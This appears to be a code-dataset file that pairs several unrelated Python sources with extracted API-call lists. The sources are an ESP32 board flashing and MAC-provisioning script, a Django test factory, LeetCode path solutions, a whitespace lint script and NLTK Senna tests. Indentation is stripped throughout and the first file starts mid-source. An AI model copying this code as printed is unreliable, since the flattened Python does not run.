sys.stdout.write('MAC address %s read OK on port %s\n' % (nextline[5:-1], port))
mac_read = True
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or not mac_read:
working_threads[port] = None
def set_vdd_sdio_voltage(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'VDD_SDIO setting complete' in nextline:
sys.stdout.write('Board VDD_SDIO Voltage configured OK on port %s\n' % port)
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0:
working_threads[port] = None
def flash_firmware(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_hashes = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'at 0x00001000' in nextline:
sys.stdout.write('Bootloader programmed OK on port %s\n' % port)
elif 'at 0x00008000' in nextline:
sys.stdout.write('Partition table programmed OK on port %s\n' % port)
elif 'at 0x00010000' in nextline:
sys.stdout.write('Application programmed OK on port %s\n' % port)
elif 'Hash of data verified' in nextline:
num_hashes += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_hashes != 3:
working_threads[port] = None
def run_initial_test(port, board):
global working_threads
if board == 'LoPy':
import run_initial_lopy_test as run_test
elif board == 'LoPy4':
import run_initial_lopy4_test as run_test
elif board == 'SiPy':
import run_initial_sipy_test as run_test
else:
import run_initial_wipy_test as run_test
try:
if not run_test.test_board(port):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def flash_lpwan_mac(port, mac):
import flash_lpwan_mac
global working_threads
try:
if not flash_lpwan_mac.program_board(port, mac):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_final_test(port, board, mac):
if board == 'LoPy':
import run_final_lopy_test as run_test
elif board == 'LoPy4':
import run_final_lopy4_test as run_test
else:
import run_final_sipy_test as run_test
try:
if not run_test.test_board(port, mac, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_qa_test(port, board):
global working_threads
if board == 'LoPy':
import run_qa_lopy_test as run_test
elif board == 'LoPy4':
import run_qa_lopy4_test as run_test
elif board == 'SiPy':
import run_qa_sipy_test as run_test
else:
import run_qa_wipy_test as run_test
try:
if not run_test.test_board(port, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def main():
cmd_parser = argparse.ArgumentParser(description='Flash the ESP32 and optionally run a small test on it.')
cmd_parser.add_argument('--esptool', default=None, help='the path to the esptool')
cmd_parser.add_argument('--espefuse', default=None, help='the path to the espefuse')
cmd_parser.add_argument('--boot', default=None, help='the path to the bootloader binary')
cmd_parser.add_argument('--table', default=None, help='the path to the partitions table')
cmd_parser.add_argument('--app', default=None, help='the path to the application binary')
cmd_parser.add_argument('--macs', default="macs.db", help='the path to the MAC addresses database')
cmd_parser.add_argument('--ports', default=['/dev/ttyUSB0'], nargs='+', help="the serial ports of the ESP32's to program")
cmd_parser.add_argument('--erase', default=None, help='set to True to erase the boards first')
cmd_parser.add_argument('--qa', action='store_true', help='just do some quality asurance test')
cmd_parser.add_argument('--board', default='LoPy', help='identifies the board to be flashed and tested')
cmd_parser.add_argument('--revision', default='1', help='identifies the hardware revision')
cmd_args = cmd_parser.parse_args()
global working_threads
global wmacs
output = ""
ret = 0
global_ret = 0
if cmd_args.qa:
raw_input("Please reset all the boards, wait until the LED starts blinking and then press enter...")
time.sleep(2.5) # wait for the board to reset
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_qa_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
print("Failed QA test on board connected to %s" % port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("QA test succeeded on all boards:-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the QA test!")
print("=============================================================")
global_ret = 1
else:
print("Reading the WLAN MAC address...")
try:
for port in cmd_args.ports:
cmd = ['python', 'esptool.py', '--port', port, 'read_mac']
working_threads[port] = threading.Thread(target=read_wlan_mac, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error reading the WLAN MAC on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("WLAN MAC address reading succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: WLAN MAC address reading failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
if int(cmd_args.revision) > 1:
# program the efuse bits to set the VDD_SDIO voltage to 1.8V
try:
print('Configuring the VDD_SDIO voltage...')
for port in cmd_args.ports:
cmd = ['python', cmd_args.espefuse, '--port', port, '--do-not-confirm', 'set_flash_voltage', '1.8V']
working_threads[port] = threading.Thread(target=set_vdd_sdio_voltage, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error setting the VDD_SDIO voltage on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("VDD_SDIO voltage setting succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: VDD_SDIO voltage setting failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
if cmd_args.erase:
try:
print('Erasing flash memory... (will take a few seconds)')
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'erase_flash']
working_threads[port] = threading.Thread(target=erase_flash, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error erasing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch erasing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch erasing failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
try:
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
open_macs_db(cmd_args.macs)
macs_list = fetch_MACs(len(cmd_args.ports))
if len(macs_list) < len(cmd_args.ports):
print("No enough remaining MAC addresses to use")
sys.exit(1)
mac_per_port = {}
i = 0
for port in cmd_args.ports:
mac_per_port[port] = macs_list[i]
i += 1
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', cmd_args.boot,
'0x8000', cmd_args.table, '0x10000', cmd_args.app]
working_threads[port] = threading.Thread(target=flash_firmware, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programming board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
else:
print("Board on port %s programmed OK" % port)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch firmware programming failed on some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please place all boards into run mode, RESET them and then \n press enter to continue with the testing process...")
time.sleep(5.0) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_initial_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error testing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
elif cmd_args.board == 'WiPy':
print("Batch test OK on port %s, firmware version %s" % (port, fw_version.number))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), ' ', 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch testing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch testing failed in some boards!")
print("=============================================================")
global_ret = 1
# only do the MAC programming and MAC verificacion for the LoPy, SiPy and LoPy4
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
print("Waiting before programming the LPWAN MAC address...")
time.sleep(3.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
set_mac_status(mac_per_port[port], "", DB_MAC_LOCK) # mark them as locked, so if the script fails and doesn't get to save, they wont be accidentally reused
working_threads[port] = threading.Thread(target=flash_lpwan_mac, args=(port, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programing MAC address on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch MAC programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch MAC programming failed in some boards!")
print("=============================================================")
global_ret = 1
print("Waiting for the board(s) to reboot...")
time.sleep(4.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_final_test, args=(port, cmd_args.board, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
print("Error performing MAC address test on port %s" % port)
else:
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_OK)
print("Final test OK on port %s, firmware version %s, MAC address %s" % (port, fw_version.number, mac_per_port[port]))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), '%s' % (mac_per_port[port]), 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Final test succeeded on all boards :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the final test!")
print("=============================================================")
global_ret = 1
macs_db.close()
sys.exit(global_ret)
if __name__ == "__main__":
main()
| [
"os.path.exists",
"sqlite3.connect",
"argparse.ArgumentParser",
"flash_lpwan_mac.program_board",
"subprocess.Popen",
"csv.writer",
"time.sleep",
"run_qa_wipy_test.test_board",
"sys.exc_info",
"sys.exit",
"threading.Thread",
"sys.stdout.flush",
"sys.stdout.write"
]
| [((1169, 1197), 'sqlite3.connect', 'sqlite3.connect', (['db_filename'], {}), '(db_filename)\n', (1184, 1197), False, 'import sqlite3\n'), ((1752, 1827), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1768, 1827), False, 'import subprocess\n'), ((2446, 2521), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (2462, 2521), False, 'import subprocess\n'), ((3195, 3270), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (3211, 3270), False, 'import subprocess\n'), ((3820, 3895), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (3836, 3895), False, 'import subprocess\n'), ((6652, 6750), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Flash the ESP32 and optionally run a small test on it."""'}), "(description=\n 'Flash the ESP32 and optionally run a small test on it.')\n", (6675, 6750), False, 'import argparse\n'), ((22388, 22408), 'sys.exit', 'sys.exit', (['global_ret'], {}), '(global_ret)\n', (22396, 22408), False, 'import sys\n'), ((1056, 1083), 'os.path.exists', 'os.path.exists', (['db_filename'], {}), '(db_filename)\n', (1070, 1083), False, 'import os\n'), ((1143, 1154), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1151, 1154), False, 'import sys\n'), ((2198, 2216), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2214, 2216), False, 'import sys\n'), ((2959, 2977), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2975, 2977), False, 'import sys\n'), ((3607, 3625), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3623, 3625), False, 'import sys\n'), ((4549, 4567), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (4565, 4567), False, 'import sys\n'), ((8108, 8123), 'time.sleep', 'time.sleep', (['(2.5)'], {}), '(2.5)\n', (8118, 8123), False, 'import time\n'), ((16644, 16659), 'time.sleep', 'time.sleep', (['(5.0)'], {}), '(5.0)\n', (16654, 16659), False, 'import time\n'), ((2106, 2161), 'sys.stdout.write', 'sys.stdout.write', (["('Board erased OK on port %s\\n' % port)"], {}), "('Board erased OK on port %s\\n' % port)\n", (2122, 2161), False, 'import sys\n'), ((2842, 2927), 'sys.stdout.write', 'sys.stdout.write', (["('MAC address %s read OK on port %s\\n' % (nextline[5:-1], port))"], {}), "('MAC address %s read OK on port %s\\n' % (nextline[5:-1], port)\n )\n", (2858, 2927), False, 'import sys\n'), ((3522, 3598), 'sys.stdout.write', 'sys.stdout.write', (["('Board VDD_SDIO Voltage configured OK on port %s\\n' % port)"], {}), "('Board VDD_SDIO Voltage configured OK on port %s\\n' % port)\n", (3538, 3598), False, 'import sys\n'), ((4154, 4218), 'sys.stdout.write', 'sys.stdout.write', (["('Bootloader programmed OK on port %s\\n' % port)"], {}), "('Bootloader programmed OK on port %s\\n' % port)\n", (4170, 4218), False, 'import sys\n'), ((5077, 5102), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port'], {}), '(port)\n', (5096, 5102), True, 'import run_qa_wipy_test as run_test\n'), ((5377, 5417), 'flash_lpwan_mac.program_board', 'flash_lpwan_mac.program_board', (['port', 'mac'], {}), '(port, mac)\n', (5406, 5417), False, 'import flash_lpwan_mac\n'), ((5851, 5900), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port', 'mac', 'fw_version.number'], {}), '(port, mac, fw_version.number)\n', (5870, 5900), True, 'import run_qa_wipy_test as run_test\n'), ((6415, 6459), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port', 'fw_version.number'], {}), '(port, fw_version.number)\n', (6434, 6459), True, 'import run_qa_wipy_test as run_test\n'), ((12515, 12530), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (12525, 12530), False, 'import time\n'), ((14259, 14274), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (14269, 14274), False, 'import time\n'), ((18620, 18635), 'time.sleep', 'time.sleep', (['(3.5)'], {}), '(3.5)\n', (18630, 18635), False, 'import time\n'), ((20367, 20382), 'time.sleep', 'time.sleep', (['(4.5)'], {}), '(4.5)\n', (20377, 20382), False, 'import time\n'), ((4273, 4342), 'sys.stdout.write', 'sys.stdout.write', (["('Partition table programmed OK on port %s\\n' % port)"], {}), "('Partition table programmed OK on port %s\\n' % port)\n", (4289, 4342), False, 'import sys\n'), ((8249, 8314), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_qa_test', 'args': '(port, cmd_args.board)'}), '(target=run_qa_test, args=(port, cmd_args.board))\n', (8265, 8314), False, 'import threading\n'), ((9510, 9566), 'threading.Thread', 'threading.Thread', ([], {'target': 'read_wlan_mac', 'args': '(port, cmd)'}), '(target=read_wlan_mac, args=(port, cmd))\n', (9526, 9566), False, 'import threading\n'), ((15297, 15354), 'threading.Thread', 'threading.Thread', ([], {'target': 'flash_firmware', 'args': '(port, cmd)'}), '(target=flash_firmware, args=(port, cmd))\n', (15313, 15354), False, 'import threading\n'), ((16816, 16886), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_initial_test', 'args': '(port, cmd_args.board)'}), '(target=run_initial_test, args=(port, cmd_args.board))\n', (16832, 16886), False, 'import threading\n'), ((1647, 1661), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1659, 1661), False, 'import sys\n'), ((4397, 4462), 'sys.stdout.write', 'sys.stdout.write', (["('Application programmed OK on port %s\\n' % port)"], {}), "('Application programmed OK on port %s\\n' % port)\n", (4413, 4462), False, 'import sys\n'), ((11153, 11216), 'threading.Thread', 'threading.Thread', ([], {'target': 'set_vdd_sdio_voltage', 'args': '(port, cmd)'}), '(target=set_vdd_sdio_voltage, args=(port, cmd))\n', (11169, 11216), False, 'import threading\n'), ((12956, 13010), 'threading.Thread', 'threading.Thread', ([], {'target': 'erase_flash', 'args': '(port, cmd)'}), '(target=erase_flash, args=(port, cmd))\n', (12972, 13010), False, 'import threading\n'), ((14703, 14714), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (14711, 14714), False, 'import sys\n'), ((18984, 19057), 'threading.Thread', 'threading.Thread', ([], {'target': 'flash_lpwan_mac', 'args': '(port, mac_per_port[port])'}), '(target=flash_lpwan_mac, args=(port, mac_per_port[port]))\n', (19000, 19057), False, 'import threading\n'), ((20555, 20647), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_final_test', 'args': '(port, cmd_args.board, mac_per_port[port])'}), '(target=run_final_test, args=(port, cmd_args.board,\n mac_per_port[port]))\n', (20571, 20647), False, 'import threading\n'), ((17613, 17648), 'csv.writer', 'csv.writer', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (17623, 17648), False, 'import csv\n'), ((21531, 21566), 'csv.writer', 'csv.writer', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (21541, 21566), False, 'import csv\n')] |
import datetime
from django.utils import timezone
from django.contrib.auth.models import User
from hknweb.events.models import Event, EventType, Rsvp
class ModelFactory:
@staticmethod
def create_user(**kwargs):
default_kwargs = {
"username": "default username",
}
kwargs = {**default_kwargs, **kwargs}
return User.objects.create(**kwargs)
@staticmethod
def create_event_type(**kwargs):
default_kwargs = {
"type": "default event type",
}
kwargs = {**default_kwargs, **kwargs}
return EventType.objects.create(**kwargs)
@staticmethod
def create_event(name, event_type, created_by, **kwargs):
required_kwargs = {
"name": name,
"event_type": event_type,
"created_by": created_by,
}
default_kwargs = {
"start_time": timezone.now(),
"end_time": timezone.now() + datetime.timedelta(hours=2),
"location": "default location",
"description": "default description",
}
kwargs = {**required_kwargs, **default_kwargs, **kwargs}
return Event.objects.create(**kwargs)
@staticmethod
def create_rsvp(user, event, **kwargs):
required_kwargs = {
"user": user,
"event": event,
}
kwargs = {**required_kwargs, **kwargs}
return Rsvp.objects.create(**kwargs)
@staticmethod
def create_event_with_rsvps():
event_create_user = ModelFactory.create_user(username="event create user")
num_rsvps = 3
rsvp_users = [
ModelFactory.create_user(username="rsvp_user_{}".format(str(i)))
for i in range(1, 1 + num_rsvps)
]
event_type = ModelFactory.create_event_type()
event_name = "custom event name"
event = ModelFactory.create_event(
name=event_name,
event_type=event_type,
created_by=event_create_user,
rsvp_limit=num_rsvps - 1,
)
rsvps = [ModelFactory.create_rsvp(rsvp_user, event) for rsvp_user in rsvp_users]
return (
event_create_user,
rsvp_users,
event_type,
event_name,
event,
rsvps,
)
| [
"hknweb.events.models.Rsvp.objects.create",
"hknweb.events.models.Event.objects.create",
"datetime.timedelta",
"django.utils.timezone.now",
"django.contrib.auth.models.User.objects.create",
"hknweb.events.models.EventType.objects.create"
]
| [((365, 394), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', ([], {}), '(**kwargs)\n', (384, 394), False, 'from django.contrib.auth.models import User\n'), ((591, 625), 'hknweb.events.models.EventType.objects.create', 'EventType.objects.create', ([], {}), '(**kwargs)\n', (615, 625), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((1170, 1200), 'hknweb.events.models.Event.objects.create', 'Event.objects.create', ([], {}), '(**kwargs)\n', (1190, 1200), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((1418, 1447), 'hknweb.events.models.Rsvp.objects.create', 'Rsvp.objects.create', ([], {}), '(**kwargs)\n', (1437, 1447), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((900, 914), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (912, 914), False, 'from django.utils import timezone\n'), ((940, 954), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (952, 954), False, 'from django.utils import timezone\n'), ((957, 984), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (975, 984), False, 'import datetime\n')] |
"""
1. Clarification
2. Possible solutions
- dfs + memoization
- Topological sort
3. Coding
4. Tests
"""
# T=O(m*n), S=O(m*n)
from functools import lru_cache
class Solution:
DIRS = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
@lru_cache(None)
def dfs(row: int, col: int) -> int:
best = 1
for dx, dy in Solution.DIRS:
newRow, newCol = row + dx, col + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] > matrix[row][col]:
best = max(best, dfs(newRow, newCol) + 1)
return best
ans = 0
rows, cols = len(matrix), len(matrix[0])
for i in range(rows):
for j in range(cols):
ans = max(ans, dfs(i, j))
return ans
# T=O(m*n), S=O(m*n)
class Solution:
DIRS = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
rows, cols = len(matrix), len(matrix[0])
outdegrees = [[0] * cols for _ in range(rows)]
queue = collections.deque()
for i in range(rows):
for j in range(cols):
for dx, dy in Solution.DIRS:
newRow, newCol = i + dx, j + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] > matrix[i][j]:
outdegrees[i][j] += 1
if outdegrees[i][j] == 0:
queue.append((i, j))
ans = 0
while queue:
ans += 1
size = len(queue)
for _ in range(size):
row, col = queue.popleft()
for dx, dy in Solution.DIRS:
newRow, newCol = row + dx, col + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] < matrix[row][col]:
outdegrees[newRow][newCol] -= 1
if outdegrees[newRow][newCol] == 0:
queue.append((newRow, newCol))
return ans
| [
"functools.lru_cache"
]
| [((356, 371), 'functools.lru_cache', 'lru_cache', (['None'], {}), '(None)\n', (365, 371), False, 'from functools import lru_cache\n')] |
#!/usr/bin/env python
#coding=utf-8
'''
Remove tailing whitespaces and ensures one and only one empty ending line.
'''
import os, re
def scan(*dirs, **kwargs):
files = []
extensions = kwargs['extensions'] if kwargs.has_key('extensions') else None
excludes = kwargs['excludes'] if kwargs.has_key('excludes') else []
for top in dirs:
for root, dirnames, filenames in os.walk(top):
dirnames = [i for i in dirnames if i in excludes]
for f in filenames:
if f in excludes:
continue
ext = os.path.splitext(f)[1].lower()
if extensions is None or ext in extensions:
files.append(os.path.join(root, f))
return files
def fixone(src):
lines = open(src, 'r').readlines()
trimed = []
for line in lines:
trimed.append(re.sub('\s+$', '', line))
while len(trimed) > 1 and not trimed[-1]:
trimed.pop()
trimed.append('')
with open(src, 'w') as f:
for line in trimed:
f.write('%s\n' % line)
def lint(root):
print('Checking tailing whitespaces in: %s' % root)
dirs = [
os.path.join(root, 'cocos'),
os.path.join(root, 'extensions'),
os.path.join(root, 'templates'),
os.path.join(root, 'tests'),
os.path.join(root, 'tools', 'simulator')
]
files = scan(*dirs, extensions=['.c', '.cpp', '.h', '.hpp', '.m', '.mm', '.java'])
for f in files:
print(f)
fixone(f)
def main():
default_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
lint(default_root)
main()
| [
"os.path.splitext",
"os.path.join",
"os.path.dirname",
"re.sub",
"os.walk"
]
| [((380, 392), 'os.walk', 'os.walk', (['top'], {}), '(top)\n', (387, 392), False, 'import os, re\n'), ((1065, 1092), 'os.path.join', 'os.path.join', (['root', '"""cocos"""'], {}), "(root, 'cocos')\n", (1077, 1092), False, 'import os, re\n'), ((1098, 1130), 'os.path.join', 'os.path.join', (['root', '"""extensions"""'], {}), "(root, 'extensions')\n", (1110, 1130), False, 'import os, re\n'), ((1136, 1167), 'os.path.join', 'os.path.join', (['root', '"""templates"""'], {}), "(root, 'templates')\n", (1148, 1167), False, 'import os, re\n'), ((1173, 1200), 'os.path.join', 'os.path.join', (['root', '"""tests"""'], {}), "(root, 'tests')\n", (1185, 1200), False, 'import os, re\n'), ((1206, 1246), 'os.path.join', 'os.path.join', (['root', '"""tools"""', '"""simulator"""'], {}), "(root, 'tools', 'simulator')\n", (1218, 1246), False, 'import os, re\n'), ((788, 813), 're.sub', 're.sub', (['"""\\\\s+$"""', '""""""', 'line'], {}), "('\\\\s+$', '', line)\n", (794, 813), False, 'import os, re\n'), ((1442, 1467), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1457, 1467), False, 'import os, re\n'), ((641, 662), 'os.path.join', 'os.path.join', (['root', 'f'], {}), '(root, f)\n', (653, 662), False, 'import os, re\n'), ((535, 554), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (551, 554), False, 'import os, re\n')] |
# -*- coding: utf-8 -*-
"""
Unit tests for Senna
"""
from __future__ import unicode_literals
from os import environ, path, sep
import logging
import unittest
from nltk.classify import Senna
from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger
# Set Senna executable path for tests if it is not specified as an environment variable
if 'SENNA' in environ:
SENNA_EXECUTABLE_PATH = path.normpath(environ['SENNA']) + sep
else:
SENNA_EXECUTABLE_PATH = '/usr/share/senna-v3.0'
senna_is_installed = path.exists(SENNA_EXECUTABLE_PATH)
@unittest.skipUnless(senna_is_installed, "Requires Senna executable")
class TestSennaPipeline(unittest.TestCase):
"""Unittest for nltk.classify.senna"""
def test_senna_pipeline(self):
"""Senna pipeline interface"""
pipeline = Senna(SENNA_EXECUTABLE_PATH, ['pos', 'chk', 'ner'])
sent = 'Dusseldorf is an international business center'.split()
result = [(token['word'], token['chk'], token['ner'], token['pos']) for token in pipeline.tag(sent)]
expected = [('Dusseldorf', 'B-NP', 'B-LOC', 'NNP'), ('is', 'B-VP',
'O', 'VBZ'), ('an', 'B-NP', 'O', 'DT'), ('international', 'I-NP',
'O', 'JJ'), ('business', 'I-NP', 'O', 'NN'), ('center', 'I-NP',
'O', 'NN')]
self.assertEqual(result, expected)
@unittest.skipUnless(senna_is_installed, "Requires Senna executable")
class TestSennaTagger(unittest.TestCase):
"""Unittest for nltk.tag.senna"""
def test_senna_tagger(self):
tagger = SennaTagger(SENNA_EXECUTABLE_PATH)
result = tagger.tag('What is the airspeed of an unladen swallow ?'.split())
expected = [('What', 'WP'), ('is', 'VBZ'), ('the', 'DT'), ('airspeed',
'NN'),('of', 'IN'), ('an', 'DT'), ('unladen', 'NN'), ('swallow',
'NN'), ('?', '.')]
self.assertEqual(result, expected)
def test_senna_chunk_tagger(self):
chktagger = SennaChunkTagger(SENNA_EXECUTABLE_PATH)
result_1 = chktagger.tag('What is the airspeed of an unladen swallow ?'.split())
expected_1 = [('What', 'B-NP'), ('is', 'B-VP'), ('the', 'B-NP'), ('airspeed',
'I-NP'), ('of', 'B-PP'), ('an', 'B-NP'), ('unladen', 'I-NP'), ('swallow',
'I-NP'), ('?', 'O')]
result_2 = list(chktagger.bio_to_chunks(result_1, chunk_type='NP'))
expected_2 = [('What', '0'), ('the airspeed', '2-3'), ('an unladen swallow',
'5-6-7')]
self.assertEqual(result_1, expected_1)
self.assertEqual(result_2, expected_2)
def test_senna_ner_tagger(self):
nertagger = SennaNERTagger(SENNA_EXECUTABLE_PATH)
result_1 = nertagger.tag('Shakespeare theatre was in London .'.split())
expected_1 = [('Shakespeare', 'B-PER'), ('theatre', 'O'), ('was', 'O'),
('in', 'O'), ('London', 'B-LOC'), ('.', 'O')]
result_2 = nertagger.tag('UN headquarters are in NY , USA .'.split())
expected_2 = [('UN', 'B-ORG'), ('headquarters', 'O'), ('are', 'O'),
('in', 'O'), ('NY', 'B-LOC'), (',', 'O'), ('USA', 'B-LOC'), ('.', 'O')]
self.assertEqual(result_1, expected_1)
self.assertEqual(result_2, expected_2)
| [
"os.path.exists",
"nltk.classify.Senna",
"nltk.tag.SennaNERTagger",
"nltk.tag.SennaChunkTagger",
"unittest.skipUnless",
"os.path.normpath",
"nltk.tag.SennaTagger"
]
